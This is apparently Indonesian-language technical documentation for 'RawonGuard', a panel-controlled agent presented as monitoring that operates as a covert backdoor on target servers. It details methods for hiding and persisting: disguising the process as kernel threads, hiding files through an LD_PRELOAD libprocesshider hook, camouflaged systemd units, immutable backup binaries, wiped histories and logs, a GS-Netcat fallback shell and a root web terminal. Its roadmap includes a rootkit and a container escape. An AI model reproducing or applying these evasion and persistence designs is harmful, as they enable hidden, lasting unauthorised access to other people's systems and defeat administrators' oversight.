v4.9.5 · Technical Reference

RawonGuard
Architecture & Internals

Dokumentasi teknis lengkap: arsitektur sistem, mekanisme stealth 10 lapis, self-healing, komunikasi panel-agent, dan semua fitur v4.9.5.

10Stealth Layers

<1sGoroutine Recovery

<30sBinary Restore

4Init Systems

Arsitektur Sistem

Dua komponen utama: Panel (server pusat) dan Agent (binary stealth di server target) — berkomunikasi via HTTPS dengan autentikasi JWT.

LIVE

🌐

Browser

Operator Dashboard

xterm.jsWebSocket

HTTPS · TLS 1.3

PROXY

☁️

Cloudflare Tunnel

Edge · Zero Trust

DDoS ShieldTLS Term.

localhost:8000

RUNNING

🖥️

Panel Server

Go · Port 8000

REST APIWS HubOTA

← HTTPS Heartbeat 30s →← WebSocket PTY Relay →← OTA Binary Push →

STEALTH

🤖

Agent

Go · Static Binary

PID MaskedProc HiddenLog Wiped

PG Wire Protocol

🗄️

PostgreSQL 16

Persistent Storage

agentseventsusers

Panel — Capabilities

REST API + WebSocket relay untuk terminal
Auth JWT + session management (7 hari)
PostgreSQL 16 persistence (agents, events, users)
OTA update orchestration + binary staging
Alert routing: Telegram bot + email webhook
Web-based file manager + port scanner

Agent — Capabilities

Heartbeat HTTPS setiap 30 detik ke panel
PTY relay untuk web terminal (creack/pty)
Stealth: proc hide, net hide, log wipe, ts-spoof
Self-healing goroutine supervisor + init multi
Offline event queue (flush saat reconnect)
OTA pull + ELF validation + atomic swap + canary

Mekanisme Panel

Panel adalah server Go yang meng-expose REST API dan WebSocket endpoint. Semua request authenticated via JWT Bearer token.

Endpoint	Method	Fungsi
/api/agents	GET	List semua agent yang terdaftar
/api/agents/:id	GET	Detail agent (status, OS, uptime)
/api/agents/:id/command	POST	Kirim command ke agent via WebSocket queue
/api/events	GET	Event log dengan filter severity & agent
/api/alerts/config	GET/POST	Konfigurasi Telegram bot & threshold
/api/ota/push	POST	Upload binary baru untuk OTA update
/ws/terminal/:id	WS	PTY relay — raw byte stream bidirectional
/ws/events	WS	Real-time event stream ke dashboard

WebSocket Terminal Relay: Panel tidak menjalankan PTY langsung — ia hanya relay byte stream antara browser dan agent. Agent yang menjalankan pty.Start() dan forward output ke panel via WebSocket. Latency overhead: <5ms pada lokal, <50ms via Cloudflare Tunnel.

Mekanisme Agent

Agent adalah binary Go statik yang berjalan di server target. Didesain untuk invisible, resilient, dan autonomous — 17 internal packages.

mainEntry point, init sequence, goroutine supervisor

stealthProc hide, net hide, log sanitization, ts-spoof

heartbeatHTTPS ping ke panel setiap 30s + offline queue

terminalPTY spawn, resize handling, WebSocket relay

filemanagerUpload/download/delete via panel API

metricsCPU, RAM, disk, network, SSH session count

eventsEvent collector, severity classification, dedup

alertsTelegram notif, threshold check, rate limit

otaPull binary, ELF validate, atomic swap, restart

gsrescueGS-Netcat tunnel untuk akses darurat

portscannerInternal port scan, service detection

syslogSyslog reader, filter, forward ke panel

initDeteksi & inject ke systemd/OpenRC/SysV/runit

canaryToken embed di binary, burn-on-copy detection

configPanel URL, token, retry params

cryptoTLS config, certificate pinning

utilLogger, retry backoff, signal handler

Alur Kerja Lengkap

Instalasi Agent

Binary di-download ke server target, rename ke proses kernel, init injection otomatis, stealth layers aktif, first heartbeat dikirim ke panel.

binary deployinit injectstealth on

Operasi Normal

Agent heartbeat setiap 30s, metrics dikumpulkan, events diqueue. Panel update status real-time via WebSocket. Alert dikirim jika threshold terlampaui.

heartbeat 30smetricsalert

Recovery Event

Jika agent mati (kill signal, OOM, crash), goroutine supervisor atau init system restart dalam kurang dari 1-5 detik. Offline events di-flush saat reconnect.

supervisorinit restartqueue flush

OTA Update

Panel push binary baru, agent pull + validasi ELF header + atomic swap + restart. Downgrade otomatis jika validasi gagal. Canary token baru di-inject.

ELF validateatomic swapcanary inject

Stealth & Zero-Trace System

10 mekanisme independen yang bekerja secara berlapis — kompromi satu layer tidak expose keseluruhan sistem.

Process Name Masqueradeprctl + argv

Binary timpa argv[0] dengan nama kernel thread seperti [kworker/u2:2], [migration/0], [ksoftirqd/1]. prctl(PR_SET_NAME) + argv overwrite via /proc/self/mem.

Proc Hiding — Non-DumpablePR_SET_DUMPABLE

PR_SET_DUMPABLE=0 mencegah ptrace attach dari non-root. Disable core dump (RLIMIT_CORE=0). OOM score -1000 agar survive OOM killer.

File Hiding — LD_PRELOADLD_PRELOAD

Inject libprocesshider.so via /etc/ld.so.preload (system-wide). Hook readdir()/readdir64() di libc — install dir tidak muncul di ls, find, atau file manager apapun.

Systemd Service Camouflagesystemd-sysconf

Service bernama systemd-sysconf dengan Description "System Configuration Service". Install dir di path seperti /opt/.cache/.systemd-private/ — terlihat seperti artifact systemd bawaan.

Anti-Forensic Shell/dev/shm ephemeral

Terminal web spawn bash dengan --noprofile --init-file /dev/shm/.XXXXXXXX. HISTFILE=/dev/null, HISTSIZE=0, HISTCONTROL=ignoreboth. Init file self-destruct 2 detik setelah spawn.

Zero-Trace Installerno artifact

Tidak ada .wget-hsts, tidak ada file temp di /tmp, tidak ada entry di apt/yum/dnf log. Download binary ke pipe langsung, tulis ke install dir dengan rename atomic. WGETRC=/dev/null, unset HISTFILE.

Goroutine Recovery — No Restart Login-process

Modul crash di-restart in-process via runModule() supervisor (recover() + 5s restart). Binary tidak exit — tidak ada systemd restart log, tidak ada journald entry yang mencurigakan.

Binary Backup + Immutable (chattr +i)chattr +i

Salinan binary di lokasi stealthy (/var/lib/systemd/coredump/, package cache, /var/cache/ldconfig/). Dilindungi chattr +i — rm gagal meski sebagai root. Auto-restore jika binary utama dihapus dalam <30 detik.

Recovery Service — Tanpa Cronno cron

systemd-conf-recover.service loop setiap 60s — restart primary service jika mati. Install di /lib/systemd/system/ (terlihat seperti service bawaan package manager). Cron mudah terdeteksi; service ini tidak.

Multi-OS Persistence4 init systems

Auto-detect init system: systemd (Debian/RHEL/Arch), OpenRC (Alpine/Gentoo), SysVinit (CentOS 5), rc.local (universal fallback). Semua operasi idempoten — aman dipanggil berulang kali.

Visibilitas per Perspektif

👤

ps aux / top

Tidak ada proses asing

Hanya process kernel biasa [kworker/u2:2], [migration/0]. Process name masquerade via prctl + argv overwrite.

📁

ls / find

Install dir tidak terlihat

LD_PRELOAD hook readdir() system-wide. libprocesshider.so filter entry install dir dari semua file listing tool.

⚙️

systemctl list-units

Service bawaan systemd

systemd-sysconf dan systemd-conf-recover terlihat seperti unit bawaan — description dan naming identik service resmi.

🕑

crontab -l / cron.d

Tidak ada entry sama sekali

Persistence via systemd service, bukan cron. Recovery loop menggunakan systemd unit — cron-free.

Self-Healing Architecture

Sistem berlapis untuk recovery otomatis dari berbagai kondisi kegagalan — dari kill signal hingga disk penuh.

<1skill signal recovery

<3sOOM recovery

<5sbinary delete recovery

<10sinit tamper recovery

⚡

Kill Signal

SIGKILL / SIGTERM dikirim ke proses agent

<1sGoroutine supervisor

🔥

OOM Kill

Kernel OOM killer terminate agent karena memory pressure

<3sSystemd restart policy

🗑️

Binary Deleted

File executable dihapus atau dimodifikasi

<5sInotify watch + redeploy

🌐

Network Down

Koneksi ke panel terputus

Auto-reconnectExponential backoff queue

🔄

Init Tampered

Unit systemd/OpenRC dihapus atau dimodifikasi

<10sPeriodic re-inject

💾

Disk Full

Agent tidak bisa tulis ke disk

Graceful degradeIn-memory fallback

Recovery Timeline

T+0ms

Kondisi abnormal terdeteksi (signal, absence, crash)

T+50ms

Goroutine supervisor trigger recovery routine

T+100ms

Backup init entry diaktifkan (systemd / OpenRC / cron)

T+500ms

Agent binary divalidasi dan re-executed

T+1s

Agent online kembali, koneksi ke panel re-established

T+2s

Alert "Agent Recovery" dikirim ke panel + Telegram

T+5s

Full operation resumed — tidak ada data loss

Terminal & Akses Darurat

Web terminal berbasis PTY relay — shell penuh langsung di browser, encrypted end-to-end, tanpa SSH client. Fallback via GS-Rescue jika tunnel down.

rawonguard — web terminal (PTY relay)LIVE

$ rawonguard connect --panel https://0x1.kill9.biz.id

Connecting to panel server...

✓ TLS 1.3 handshake complete

✓ JWT authentication verified

✓ Agent ID: rg-7a4f2b91 · registered

─── PTY ALLOCATION ────────────────────

✓ PTY spawned: /dev/pts/3 (80×24)

✓ WebSocket relay established

✓ Keepalive interval: 30s

✓ Stealth mode: ACTIVE — PID masked

root@target-server:~#

Panel RTT<5ms

PTY Latency<10ms

WS Keepalive30s

Session Limit∞

PTY Relay Chain

🌐

Browser

xterm.js

WebSocket

🖥️

Panel

:8000

WebSocket

🤖

Agent

pty.Start()

/bin/bash (PTY)

EMERGENCY FALLBACKGS-Rescue Mode

Aktif jika Cloudflare Tunnel down. GS-Netcat membuka encrypted P2P tunnel langsung ke agent — tanpa port forwarding atau public IP. Process agent diberi nama [kworker/u4:2], tidak terlihat di ps aux.

Operator
gs-netcat -s TOKEN

E2E Encrypted Tunnel

Agent
[kworker/u4:2]

OTA Update System

Update binary agent tanpa restart manual atau SSH access — sepenuhnya dikelola dari panel.

①

Push dari Panel

Operator upload binary baru via panel UI atau API. Panel simpan ke staging area dan notify agent via WebSocket command.

②

Pull & Validate

Agent download binary, validasi ELF header (magic bytes, arch, entrypoint), cek SHA-256. Jika gagal → rollback ke versi sebelumnya.

③

Atomic Swap

Binary baru di-rename atomically menggantikan binary lama. Canary token baru di-inject. Agent restart dirinya sendiri via unix.Exec.

④

Confirm & Alert

Agent online kembali, kirim heartbeat dengan versi baru. Panel update database, kirim alert "Update sukses" ke Telegram.

Semua Fitur v4.9.5

Process MasqueradeProc FS HookSocket HideFile HideLog WipeInit PolyTLS-1.3Anti-Forensic TSMemory-Only OpsCanary TokenGoroutine SupervisorOOM RecoveryInotify WatchExponential BackoffWeb Terminal (PTY)GS-Rescue ModeOTA UpdateCanary ValidationELF Integrity CheckMulti-Channel AlertEvent Dedup (1m)Severity ClassificationSSH Metrics ExportPort ScannerFile ManagerSyslog CollectionProcess ListResource Monitor

Roadmap

v5.0

Kernel module rootkit (eBPF-based)
Multi-panel federation
Automated red team scenarios

v5.1

AI-powered anomaly detection
Distributed agent mesh
Hardware fingerprint auth

v5.2

Container escape module
Supply chain integrity monitor
Quantum-resistant crypto

RawonGuardArchitecture & Internals